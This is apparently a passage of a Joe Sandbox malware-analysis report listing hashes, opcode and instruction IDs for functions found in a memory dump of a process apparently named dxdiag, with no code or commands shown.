                                                                                                                • Instruction ID: f274cfa4fd23e6236676cd1f27d37eda4d2c4e9f7f04722437533fa671a78e6f
                                                                                                                • Opcode Fuzzy Hash: 75d62604bc8ba10a3965eda64e96c0529ca78dc7befd1f69851b412b056e6d36
                                                                                                                • Instruction Fuzzy Hash: 03E11136718215CFCB08CF38D89126BB7E2EB8A314F1A857ED846D7391DB38D8058B85
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 25fc821ec4db295837e7241b6350ca118c1fd0113733dc9c373dc5578713d375
                                                                                                                • Instruction ID: 66bc5b333a0c6ee299b6e4738c483b6afcae0af6661c562ee48f541c7812e622
                                                                                                                • Opcode Fuzzy Hash: 25fc821ec4db295837e7241b6350ca118c1fd0113733dc9c373dc5578713d375
                                                                                                                • Instruction Fuzzy Hash: 71D14631608311ABD314DF24C88166FF7E1EB99718F15E92EE98593391D778DC05CB8A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c961975c57f87857eab043c76c47428008017fdca8ad897df3e3d02d69e77613
                                                                                                                • Instruction ID: 193ede2baf899d4cd5aa5ba4271a00cee3d3de787d1d5f2eafa8c2ae60b57e67
                                                                                                                • Opcode Fuzzy Hash: c961975c57f87857eab043c76c47428008017fdca8ad897df3e3d02d69e77613
                                                                                                                • Instruction Fuzzy Hash: ADF12931A083525BC714CE29C99016BB7E3AFC5324F198A2EE4E5673D5DB38ED068B85
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0f22763de4bcdc26485400349c62461b958b278f38fe56ac1e4a402e23215dde
                                                                                                                • Instruction ID: 5cf728b11992c65e55bd4be9dc5e9eb5593f12857077bfd5cee5c93eadafeb55
                                                                                                                • Opcode Fuzzy Hash: 0f22763de4bcdc26485400349c62461b958b278f38fe56ac1e4a402e23215dde
                                                                                                                • Instruction Fuzzy Hash: 78E179711087418FD720DF29C880B6BBBE1EF99304F44882EE4D597791E779E948CB96
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 5f5a32466b316229b481c2a5b140de938fb66be6b533df1eade2e4f47dd166c5
                                                                                                                • Instruction ID: 49bb995cc6258f3b287554f64d1e249e4e01c3de4c67095bf9184da5ae40cd93
                                                                                                                • Opcode Fuzzy Hash: 5f5a32466b316229b481c2a5b140de938fb66be6b533df1eade2e4f47dd166c5
                                                                                                                • Instruction Fuzzy Hash: 1BA13335A083118BC714DF29E88062BB7F2EF89310F09D56EE9918B395D779EC51CB86
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: afb16abf37928c5a7a5a34e99eaa9267622f6c5fd6ab5e95d3228bbac6b96ad5
                                                                                                                • Instruction ID: 7ac7e3b168bbb7afd94fe29f1e54d1f5c433d12e6b19e411e96f11bbc3239d1b
                                                                                                                • Opcode Fuzzy Hash: afb16abf37928c5a7a5a34e99eaa9267622f6c5fd6ab5e95d3228bbac6b96ad5
                                                                                                                • Instruction Fuzzy Hash: 88B104B5908201AFD7209F64CC42B5ABBE1FBD5314F144A3EFC98A32A0D735D855DB8A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 1484557844803522bcb117125b195ac7485a0970c045e37efc9e321e46d71030
                                                                                                                • Instruction ID: ba8a09dc2418c02870105bc3f6dd75cfc533c2f59140fb6bc1d6151d28bd9c6f
                                                                                                                • Opcode Fuzzy Hash: 1484557844803522bcb117125b195ac7485a0970c045e37efc9e321e46d71030
                                                                                                                • Instruction Fuzzy Hash: CB910475A043019BD3189F29C89166BB7F2FFC9720F19A52EE895A7390D738EC41CB85
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 192b9d08ce17bc1d312091997c30b37e60dce660e4c0c653e6da0c20b7bf1f23
                                                                                                                • Instruction ID: 86fd598b9c61968874822396d4ab8b809d08d2c2737f86e898986d6ce750098e
                                                                                                                • Opcode Fuzzy Hash: 192b9d08ce17bc1d312091997c30b37e60dce660e4c0c653e6da0c20b7bf1f23
                                                                                                                • Instruction Fuzzy Hash: 7FC15BB29087418FC360CF28DC86BABB7E1BF85318F09492DD5DAD6242E778A155CB46
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 63f2497d7e62285dada7a2876494175f4b0e6dd28d60008838a8d86744dd0c73
                                                                                                                • Instruction ID: 6dc5e2ab74ae951aaa46e5139dd55047cfb70fd72833bef498b558f7cf56f5ea
                                                                                                                • Opcode Fuzzy Hash: 63f2497d7e62285dada7a2876494175f4b0e6dd28d60008838a8d86744dd0c73
                                                                                                                • Instruction Fuzzy Hash: 81D19A205087D18ED326CB3C8848B897FE15B6B324F0A83D9D4E65F3E3C3699946C766
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 831baefd6db2069bebddcfca7b26fc92d614f56bb49a6b6e043571ad404f781f
                                                                                                                • Instruction ID: 20f5ed072c6bfbda0bc91a0cdde0de7c4fc080ad42862f5d594c9abb615ab40b
                                                                                                                • Opcode Fuzzy Hash: 831baefd6db2069bebddcfca7b26fc92d614f56bb49a6b6e043571ad404f781f
                                                                                                                • Instruction Fuzzy Hash: F6912832B59A804BD72C897C4C623AABA834BD6234F2CC77EE6B6873E5D96C48454345
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 18cbb3298976ce66fbbf99e1a8bd522615c6d0d3dc0e3a5cc9d0c63d71211507
                                                                                                                • Instruction ID: 7a1eed898d1216762a2c7ff3d336fcba6ee216a9b47b043e4d7b41fbc61cb180
                                                                                                                • Opcode Fuzzy Hash: 18cbb3298976ce66fbbf99e1a8bd522615c6d0d3dc0e3a5cc9d0c63d71211507
                                                                                                                • Instruction Fuzzy Hash: 4E711726B59AF047D328853D6C223B67A824FD6334F6DC36EE5F28B3E1D56D88058349
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 93d4583822bfd4113c2639fd17e1e1593877d842793fc615dd777add114e4b86
                                                                                                                • Instruction ID: 3490b61dfd93ba184312fd33364581a50fe03d296d349fd53c95ac3e2b442cca
                                                                                                                • Opcode Fuzzy Hash: 93d4583822bfd4113c2639fd17e1e1593877d842793fc615dd777add114e4b86
                                                                                                                • Instruction Fuzzy Hash: 9C713A72714B008FD3249A3DC9823ABBBE2AB95314F18493ED5E7C33C6E63994168316
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 5af0ea262aa505753d122ffbdef0684fedc436534fd759e33f9ed682c210788a
                                                                                                                • Instruction ID: c9e52aa4780a1a71b0f6536462f5c40a3ec639637a903cde8fa83514c66493a3
                                                                                                                • Opcode Fuzzy Hash: 5af0ea262aa505753d122ffbdef0684fedc436534fd759e33f9ed682c210788a
                                                                                                                • Instruction Fuzzy Hash: 33514C31A053118BD7209F2888C056FF792EFCA324F29A62EF59557361DB79EC0287D9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a4ffa1a60249f0232ffc83a46548397397e6d537db2bb810b08643fa12542080
                                                                                                                • Instruction ID: 5fccf0568e07a38315d86764f9ee9d51859a75a7ad21a5e232c3aae3b42cafbc
                                                                                                                • Opcode Fuzzy Hash: a4ffa1a60249f0232ffc83a46548397397e6d537db2bb810b08643fa12542080
                                                                                                                • Instruction Fuzzy Hash: 6651F6B2714B094BC708CE2CEC9123AB7D2ABD5204F99C63DE956C7381EF78E9158785
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 09487fa8393e4d5ced12145e9cb1f49e8312c96201f8f64dc6a060f30583d89a
                                                                                                                • Instruction ID: a491210344505289bb21a907e851a53a7042adf8aad5960711688d9cdac3ce5c
                                                                                                                • Opcode Fuzzy Hash: 09487fa8393e4d5ced12145e9cb1f49e8312c96201f8f64dc6a060f30583d89a
                                                                                                                • Instruction Fuzzy Hash: 0D51E1B1A4C3118BC324CF14C89266BB7B2EF96704F59855EE8856B384E335EA45C78A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 7d7a100692903cc70a5f599463766be65404a136b4fb17078803adac557c427f
                                                                                                                • Instruction ID: 53513fe6c79870b6d8cfb68088b58b425f5e81915f7a899e94c8849bc048f5ff
                                                                                                                • Opcode Fuzzy Hash: 7d7a100692903cc70a5f599463766be65404a136b4fb17078803adac557c427f
                                                                                                                • Instruction Fuzzy Hash: CF51FFB525C3108BC718CF24C8916ABB7F2EFD6704F48995DE4858B3A0E339D901C74A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: cd73a24cf2c1eeda96ee9a537b8945225a616c5a5e26b6f04eeaa05b60d36c92
                                                                                                                • Instruction ID: 8cf5b8e416399a360e4fa64b07ba8964707688b42fdc82ebe9d8400aceb4da68
                                                                                                                • Opcode Fuzzy Hash: cd73a24cf2c1eeda96ee9a537b8945225a616c5a5e26b6f04eeaa05b60d36c92
                                                                                                                • Instruction Fuzzy Hash: B8517A3BA18725CFDB04DF28E89025AB3A2FF8A351F1A847DDA8587242D734DD41CB85
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a33f91a27a4aeccfc9f3fb9721e5cd8899e2d19283775b4607b561721dd59f1b
                                                                                                                • Instruction ID: 8b22c1b07ae07e9e8c70e54b2664e987efbc7c12ed24ca91e0e63b8894becd6c
                                                                                                                • Opcode Fuzzy Hash: a33f91a27a4aeccfc9f3fb9721e5cd8899e2d19283775b4607b561721dd59f1b
                                                                                                                • Instruction Fuzzy Hash: EB41DF741093818BC720CF25C8616ABBBF1EF93364F044A5CE5C28B381E3B99945CB9B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: f786a1eb69f8401f55855f4f3fd31df1bddefe192891aa7b36f300e25ebbc475
                                                                                                                • Instruction ID: 75762df367a30ba79ec702eae056234a675c2c7c4eda59630da6670717d7c4bd
                                                                                                                • Opcode Fuzzy Hash: f786a1eb69f8401f55855f4f3fd31df1bddefe192891aa7b36f300e25ebbc475
                                                                                                                • Instruction Fuzzy Hash: 40618EB08007419BD3109F28ED4970BBAA0FF4136DF14473DE8AA966F1D375D9A5CB8A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 648467540263f3123b4c02ec5b4132445b1e857d55f0986aeedafcec0d1fb7a4
                                                                                                                • Instruction ID: c9803781c8c3e1c1503bbf2b7e0cb91ad599f48646208f78850af9b5bc693bbc
                                                                                                                • Opcode Fuzzy Hash: 648467540263f3123b4c02ec5b4132445b1e857d55f0986aeedafcec0d1fb7a4
                                                                                                                • Instruction Fuzzy Hash: DB5150B5A483408FD3209F65A88076FB7E4EBC6304F14493EF594A7281EBB8D5018B8B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 7da97045892d917d151bcc5c07033d7c408d372ec9e13f9ab9d0c550b62c297c
                                                                                                                • Instruction ID: a69caac395799761bf6e71e20599b88d1efc5e3bd1c132c25f0773fc5f0ec801
                                                                                                                • Opcode Fuzzy Hash: 7da97045892d917d151bcc5c07033d7c408d372ec9e13f9ab9d0c550b62c297c
                                                                                                                • Instruction Fuzzy Hash: 01516DB15087548FE714DF29D49435BBBE1BBC8318F044A2EE5E987350E379DA088F86
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 79894954648a27af2fb2ffeb8b402e5cb964693089f0543b0c71abd2ccfebdb9
                                                                                                                • Instruction ID: 4eb4d543e274e6005dd5ac3d1296328a5cf021be0d14d03e83e5a7fc676d431e
                                                                                                                • Opcode Fuzzy Hash: 79894954648a27af2fb2ffeb8b402e5cb964693089f0543b0c71abd2ccfebdb9
                                                                                                                • Instruction Fuzzy Hash: 98515FB5A483508FD3209F65A88076FB7E4EBC6704F04493EF594A7390DBB8D9018B8B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: ac499be7da668eacc6ab3733cda7f845be0ad4a5ad9f0ceb31502b03eb374089
                                                                                                                • Instruction ID: e982278c98a4a55a51dcc6fb07df31f24c4864dac0726d46ec862b3c15d8158c
                                                                                                                • Opcode Fuzzy Hash: ac499be7da668eacc6ab3733cda7f845be0ad4a5ad9f0ceb31502b03eb374089
                                                                                                                • Instruction Fuzzy Hash: A771E231A086918FC715CB3C885439EBFE16F5A324F19C799D4B99B3E2C7348946CB91
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: b836058826120a22ad1171bfbe91918f388b7e8695f0bc64f326c4c29ef872e3
                                                                                                                • Instruction ID: 61c9cee79081f457ad2a062ba2558c50646c3fe9279bd5e78a79f88c837ed506
                                                                                                                • Opcode Fuzzy Hash: b836058826120a22ad1171bfbe91918f388b7e8695f0bc64f326c4c29ef872e3
                                                                                                                • Instruction Fuzzy Hash: 22518372751A018BC328CE39CC82567B6D3FBE5314728CA3D9196C76E5DA78E8118748
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 87c11cc2aa61918a5ec01a7bc7fdb27d64084d8cc58c4669a92926849c0a8f20
                                                                                                                • Instruction ID: 21dea60bbb219d656e905d7e418e96adc8bcbb3988d6d2a1a81a27e5a390af3f
                                                                                                                • Opcode Fuzzy Hash: 87c11cc2aa61918a5ec01a7bc7fdb27d64084d8cc58c4669a92926849c0a8f20
                                                                                                                • Instruction Fuzzy Hash: 62513B712087955FC724DA28C4912BBB7E2EFCA304F05CA1DE4DA8B385D239ED05D786
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 05ba705d4abcc1caf8ae517ee4ae023d52f44c0ca7fa6ea03e4d84e5a78e3aaf
                                                                                                                • Instruction ID: f82dd9b0d87d4a5d6c48483010ad98791815e4d23863ac411e0dcac4d361aaf7
                                                                                                                • Opcode Fuzzy Hash: 05ba705d4abcc1caf8ae517ee4ae023d52f44c0ca7fa6ea03e4d84e5a78e3aaf
                                                                                                                • Instruction Fuzzy Hash: 57515A33A4A98047D328C93C5C213FA6A934FD7230B2D977FE5B2873E1C56D489A5306
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8fb7f438c5c4dca9d542d010704f564aa8c339b5d82f191b9433bdcfd20d3972
                                                                                                                • Instruction ID: d41090bbc5cdf1eee4b9e767fbef583de22e64e79b7a5adf37564b72c8c73a6c
                                                                                                                • Opcode Fuzzy Hash: 8fb7f438c5c4dca9d542d010704f564aa8c339b5d82f191b9433bdcfd20d3972
                                                                                                                • Instruction Fuzzy Hash: 8741FA3170C2654BC7289E2D8D5813ABBD24FC5618F0DCA7AE8C5AB7CBE5789D0097C9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: f0501dee0cd475f0528001a804b543f83bb980b08efb0e061e04e26c6bcac48f
                                                                                                                • Instruction ID: 9fa01659ad8de31616e7a3bece4b0ebd12d10b8bf800f35ceca4d3f4b48f7db6
                                                                                                                • Opcode Fuzzy Hash: f0501dee0cd475f0528001a804b543f83bb980b08efb0e061e04e26c6bcac48f
                                                                                                                • Instruction Fuzzy Hash: 5251BF32B656018FD31CCF7CCC82666B6E3EB9531972DC53E9056C77A5DA38E8028748
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 459afc3e467d5247fe6443b366a0b0acd94dcc8ddc2ffa92890ff12f6ad588ef
                                                                                                                • Instruction ID: a12b8c0182a61b8c0dcb24e574365e2446023a880a9609403b6df3a4a4656157
                                                                                                                • Opcode Fuzzy Hash: 459afc3e467d5247fe6443b366a0b0acd94dcc8ddc2ffa92890ff12f6ad588ef
                                                                                                                • Instruction Fuzzy Hash: BB31593BA19B15CFE7089F79D89021B77A2FBCA350F2A847DDA8543652CB35D9018781
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d8c4e62ba9308e78600a03fb08915fb589ea36e633141cd22722de6b1452e6b6
                                                                                                                • Instruction ID: 2adf1b471041e318d085131b5c25906aa0ef628fdecf1c7cc439bd873dbe0119
                                                                                                                • Opcode Fuzzy Hash: d8c4e62ba9308e78600a03fb08915fb589ea36e633141cd22722de6b1452e6b6
                                                                                                                • Instruction Fuzzy Hash: 2A21F736B106018BD72CCB38CCA163B7793ABCA31572DC13E9197C73E9DE34A8018614
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 952670a55784d431d970a3eed704d470b0aeab0eb4664b3b35544288deaf35a8
                                                                                                                • Instruction ID: 157f9dc6c30a3f8e7012f38a3543129662c1ccbafda1b3b4c39616780386f915
                                                                                                                • Opcode Fuzzy Hash: 952670a55784d431d970a3eed704d470b0aeab0eb4664b3b35544288deaf35a8
                                                                                                                • Instruction Fuzzy Hash: 9E210E7540D3819BC7149B3888012AFFBA1AF93328F149A6DF5D297292D339C847C71B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ce5268b2cb12f830d2f938287316391b2315b06526712d89e8233c91e4a213b8
                                                                                                                • Instruction ID: 96f90f60e8dd0990346840b1114267e9a804311747d2bbb38bbaf23e5c27bc8a
                                                                                                                • Opcode Fuzzy Hash: ce5268b2cb12f830d2f938287316391b2315b06526712d89e8233c91e4a213b8
                                                                                                                • Instruction Fuzzy Hash: 4E11D632B182220BE75CDE62D8F967B6352E78931070A013EDE47673D1CEB0F801D264
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 4720f93b5e583e1436a46f0c8ff2d578415a284bcd34cb36c7c667644f46f1a2
                                                                                                                • Instruction ID: e867d9d1f28d7a5eba1ee3aa62fd3901ca7eafcffc61e3722708c4ddc888ec81
                                                                                                                • Opcode Fuzzy Hash: 4720f93b5e583e1436a46f0c8ff2d578415a284bcd34cb36c7c667644f46f1a2
                                                                                                                • Instruction Fuzzy Hash: 6A019675A08340ABE3608F289940BABB7E6B78A314F245A2DE5C493255CB75D8428B9D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
